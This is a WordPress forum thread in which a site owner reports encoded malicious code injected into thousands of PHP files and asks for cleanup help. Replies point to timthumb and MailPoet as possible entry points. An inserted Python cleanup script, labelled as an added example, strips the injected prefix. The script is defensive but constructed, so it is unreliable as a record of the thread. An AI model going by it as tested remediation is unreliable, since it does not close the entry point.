Hacked server: I am looking to remove malicious code in PHP

  • Status: unresolved
  • #539980
    radiCarl
    Member
    WordPress Knight
    137 contributions

    Hello,

    – WordPress version: latest version
    – PHP/MySQL version:
    – Theme used: custom
    – Extensions installed: far too many
    – Site address: carlboileau.com

    Problem(s) encountered: hacked server

    Hello, all of my blogs, hosted on a professional server in Montreal, were hacked during the night between last Thursday and Friday. It turns out that malicious code was injected at the beginning of all the PHP files stored in my FTP-accessible space. As a result, none of my blogs works properly any more, and I don't really know what operations the hackers are having the server carry out.

    In short, I am giving myself the day today to pick up the pieces and try to solve the problem. To that end, I think I will have to reinstall all of the blogs from old backups. However, one thing that could perhaps save me time would be help finding a command that could remove (and clean up) in one go all the code that was added to my PHP pages. After this cleanup, I could restart my blogs and try to hunt down the backdoor.

    But before proceeding, I mainly wanted the community's advice on finding the point of entry and plugging the hole with the right countermeasure.

    Thanks again for your understanding and support in this most tedious ordeal.

    Carl

    NB. The malicious code in question is the same everywhere in my 8000 PHP pages. If you manage to make any sense of this flood of encoded gibberish, let me know.


    #961955
    Aphrodite
    Participant
    WordPress Master
    4750 contributions

    Does one of the extensions use timthumb? Is the timthumb.php file present on the server (or thumb.php, it depends)? First you have to find the vulnerability before cleaning up….

    #961956
    Flobogo
    Moderator
    WordPress Master
    16278 contributions

    Or is the Wysija / MailPoet plugin used on one of the sites?
    Apparently the infected sites show this type of code in the infected .php files.
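
A defensive sketch of the clean-up discussed in this thread, added here as an example and not posted by any participant: it derives the injected block by comparing one infected file with its backup copy, strips only exact byte-for-byte matches, and lists timthumb.php/thumb.php files for review. The function names, the quarantine layout and the sample files are assumptions constructed for illustration.

```python
import shutil, tempfile
from pathlib import Path

SUSPECT_NAMES = {"timthumb.php", "thumb.php"}  # file names raised in the replies

def injected_prefix(infected: bytes, backup: bytes) -> bytes:
    """Bytes prepended to the backup copy to produce the infected file."""
    if not backup or len(infected) <= len(backup) or not infected.endswith(backup):
        raise ValueError("not a pure prepend of the backup; inspect this file by hand")
    return infected[: len(infected) - len(backup)]

def scan(root: Path, prefix: bytes):
    """Return (files starting with the exact prefix, files with a suspect name)."""
    infected, suspects = [], []
    for path in sorted(root.rglob("*.php")):
        if path.name.lower() in SUSPECT_NAMES:
            suspects.append(path)
        with path.open("rb") as fh:
            if fh.read(len(prefix)) == prefix:
                infected.append(path)
    return infected, suspects

def clean(path: Path, prefix: bytes, root: Path, quarantine: Path) -> bool:
    """Keep the infected original under quarantine/, then rewrite the file without the prefix."""
    data = path.read_bytes()
    if not data.startswith(prefix):
        return False
    kept = quarantine / path.relative_to(root)
    kept.parent.mkdir(parents=True, exist_ok=True)
    shutil.copy2(path, kept)  # preserves mtime, useful for dating the intrusion
    path.write_bytes(data[len(prefix):])
    return True

def demo():
    """Constructed sample tree: two infected files and one untouched timthumb.php."""
    marker = b"<?php /* CONSTRUCTED INJECTION MARKER */ ?>"
    with tempfile.TemporaryDirectory() as tmp:
        root, quarantine = Path(tmp, "www"), Path(tmp, "quarantine")
        (root / "wp-content/plugins/x").mkdir(parents=True)
        original = b"<?php echo 'index';\n"
        (root / "index.php").write_bytes(marker + original)
        (root / "wp-content/plugins/x/a.php").write_bytes(marker + b"<?php echo 'a';\n")
        (root / "wp-content/plugins/x/timthumb.php").write_bytes(b"<?php // thumb\n")
        prefix = injected_prefix((root / "index.php").read_bytes(), original)
        infected, suspects = scan(root, prefix)
        cleaned = [p for p in infected if clean(p, prefix, root, quarantine)]
        remaining, _ = scan(root, prefix)
        restored = (root / "index.php").read_bytes() == original
        return len(infected), [p.name for p in suspects], len(cleaned), len(remaining), restored

if __name__ == "__main__":
    print(demo())
```

Stripping the prefix does not close the entry point or remove a backdoor dropped elsewhere, so the listed suspect files and the quarantined originals still need review.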
